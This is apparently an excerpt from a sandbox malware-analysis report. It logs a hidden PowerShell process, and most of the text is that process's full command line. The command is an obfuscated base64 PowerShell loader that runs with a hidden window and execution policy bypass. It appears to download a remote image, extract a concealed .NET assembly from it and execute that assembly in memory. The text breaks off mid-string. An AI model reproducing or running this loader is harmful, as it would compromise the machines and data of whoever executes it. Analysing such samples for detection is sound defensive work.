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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('vHbRIwO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Dec. 8, 2023, 9:39 a.m.	thread_identifier: 2080 thread_handle: 0x000002f0 process_identifier: 2076 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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